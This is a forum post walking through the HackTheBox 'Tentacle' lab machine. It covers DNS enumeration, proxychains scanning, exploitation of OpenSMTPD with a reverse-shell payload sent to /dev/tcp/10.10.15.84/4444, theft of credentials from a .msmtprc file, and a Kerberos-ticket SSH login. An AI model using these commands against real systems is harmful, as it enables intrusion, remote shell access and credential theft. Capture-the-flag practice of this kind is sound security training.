TUTORIAL Tutorial Get user Tentacle hard machine
by sami92 - March 07, 2021 at 08:48 PM
#1
user:
    1. Scan for dnsenum subdomains
        - perl dnsenum.pl --threads 64 --dnsserver 10.10.10.224 -f /opt/DICTIONARY/SecLists/Discovery/DNS/subdomains-top1million-110000.txt realcorp.htb
            ns.realcorp.htb. 259200 IN A 10.197.243.77
            proxy.realcorp.htb. 259200 IN CNAME ns.realcorp.htb.
            ns.realcorp.htb. 259200 IN A 10.197.243.77
            wpad.realcorp.htb. 259200 IN A 10.197.243.31
    2. Configure proxychains with the corresponding subdomains identified
        - nano /ets/proxychains4.conf
            * http 10.10.10.224 3128
            * http 127.0.0.1 3128
            * http 10.197.243.77 3128
    3. Start scans on the identified subdomains
        - proxychains4 nmap -sT -Pn 10.197.243.31
        - Add new settings to / etc / hosts
            * 10.197.243.31 wpad.realcorp.htb
    4. Start autodiscover with dirsearch for wpad.realcorp.htb
        - sudo proxychains4 /opt/TOOLS/dirsearch/dirsearch.py -w /opt/DICTIONARY/SecLists/Discovery/Web-Content/raft-small-files-lowercase.txt -e dat -f -t 20 -u http: / /wpad.realcorp.htb
            * /wpad.dat 200
    5. With the content of wpad.dat new network addresses are identified scan and verify active ips
        - proxychains4 nmap -sP 10.241.251.0/24
        - an OpenSMTPD service is identified at 10.241.251.113
    6. Exploit the OpenSMTPD service
        - proxychains4 python3 getShell.py 10.241.251.113 25 'bash -c "exec bash -i &> /dev/tcp/10.10.15.84/4444 <& 1"'
        - get user crednecials at /home/j.nakazawa/.msmtprc
    7. Create a kerberos ticket with the identified credentials and add new settings in / etc / hosts and /etc/krb5.conf
        - sudo apt install krb5-user
        - make sure you have only (10.10.10.224 srv01.realcorp.htb) in the / etc / hosts file
        - Add new settings in /etc/krb5.conf
            [libdefaults]
                default_realm = REALCORP.HTB
            [realms]

                REALCORP.HTB = {
                        kdc = 10.10.10.224
                }
            [domain_realm]
                .realcorp.htb = REALCORP.HTB

    8. Generate the ticket by entering the identified credentials
        - kinit j.nakazawa
        - klist
    9. Connect via ssh and get the flag
        - ssh [email protected]
#2
nice one - thanks for this

Possibly Related Threads…
Thread Author Replies Views Last Post
SELLING HTB Toby Machine Writeup mobile1 15 2,317 November 30, 2021 at 08:19 AM
Last Post: mobile1
SELLING HTB Toby Machine Writeup mobile1 2 593 November 16, 2021 at 11:53 PM
Last Post: mobile1
TUTORIAL Pikaboo Machine Discussion La Lisa 99 28,514 November 15, 2021 at 08:47 PM
Last Post: as3di0

 Users browsing this thread: 2 Guest(s)